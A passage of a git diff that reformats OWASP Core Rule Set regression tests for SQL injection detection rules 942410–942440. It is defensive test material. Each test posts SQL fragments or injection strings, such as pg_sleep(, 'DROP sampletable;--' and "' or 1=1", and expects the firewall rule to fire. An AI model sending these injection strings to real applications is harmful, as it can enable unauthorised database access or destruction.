text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "name_const(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 69 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "now(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 70 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "nOW(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 71 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "ord(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 72 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "password?(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 73 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "password/?(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 74 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "Password>$(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 75 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pg_sleep(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 76 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pi(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 77 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "PI(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 78 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pow(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 79 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "POW(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 80 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "quarter. (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 81 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "rand(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 82 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "Rand (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 83 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "RAND(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 84 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "replace(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 85 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "REPLACE(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 86 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "round (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 87 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "round(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 88 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "rtrim(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 89 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "RTRIM(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 90 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=sin (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 91 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SIN(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 92 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=sleep(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 93 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SLEEP (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 94 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=strcmp(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 95 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=substr(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 96 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SUBSTR(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 97 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=substring(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 98 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SUBSTRING(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 99 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=sysdate(" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 100 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "time (" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 101 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=time%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 102 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=trim%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 103 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=Uncompress+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 104 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=unhex%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 105 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=uNhEx%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 106 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=updatexml%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 107 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=UpdateXML%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 108 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=UPPER%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 109 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=user+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 110 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=user%2F%3F%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 111 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=user%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 112 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=values+%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 113 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=VALUES%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 114 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=version%3D%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 115 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=version%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 116 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=xmltype%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 117 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=XMLType%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] + - test_id: 118 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=year%5D%3D%28" + version: HTTP/1.0 + output: + log: + expect_ids: [942410] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml index 576280e8a..b0d3ee0e6 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml @@ -1,24 +1,22 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942420.yaml +rule_id: 942420 tests: - - test_title: 942420-1 + - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (8)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Cookie: "ar=%7e%7e%7e%7e%7e%7e%7e%7e%7e&foo=var" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - output: - log_contains: id "942420" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Cookie: "ar=%7e%7e%7e%7e%7e%7e%7e%7e%7e&foo=var" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + output: + log: + expect_ids: [942420] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml index cca5bfa0c..4b71697ff 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml @@ -1,24 +1,22 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942421.yaml +rule_id: 942421 tests: - - test_title: 942421-1 + - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (3)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Cookie: "cookie=@@@@@@@@@@@@@" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942421" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Cookie: "cookie=@@@@@@@@@@@@@" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942421] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml index aa1a717cd..b8e732451 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml @@ -1,24 +1,22 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942430.yaml +rule_id: 942430 tests: - - test_title: 942430-1 + - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=(((((())))))&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942430" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=(((((())))))&var2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [942430] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml index fb9b2e02a..0254f2112 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml @@ -1,24 +1,22 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942431.yaml +rule_id: 942431 tests: - - test_title: 942431-1 + - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=-------------------&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942431" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=-------------------&var2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [942431] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml index b30a904c8..0a34adce1 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml @@ -1,24 +1,22 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942432.yaml +rule_id: 942432 tests: - - test_title: 942432-1 + - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=;;dd foo bar" - version: HTTP/1.0 - output: - log_contains: id "942432" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=;;dd foo bar" + version: HTTP/1.0 + output: + log: + expect_ids: [942432] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml index 508f02823..7af45734d 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml @@ -1,339 +1,337 @@ --- meta: author: "Christian S.J. Peron, Max Leske, azurit" - description: None - enabled: true - name: 942440.yaml +rule_id: 942440 tests: - - test_title: 942440-1 + - test_id: 1 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=DROP%20sampletable%3b--" - version: HTTP/1.0 - output: - log_contains: id "942440" - - test_title: 942440-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=DROP%20sampletable%3b--" + version: HTTP/1.0 + output: + log: + expect_ids: [942440] + - test_id: 2 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=' or 1=1;%00" - output: - log_contains: id "942440" - - test_title: 942440-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' or 1=1;%00" + output: + log: + expect_ids: [942440] + - test_id: 3 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "POST" - port: 80 - version: "HTTP/1.0" - uri: "/post" - data: "test=OR 1# " - output: - log_contains: id "942440" - - test_title: 942440-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=OR 1# " + output: + log: + expect_ids: [942440] + - test_id: 4 desc: "SQL Comment Sequence" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test 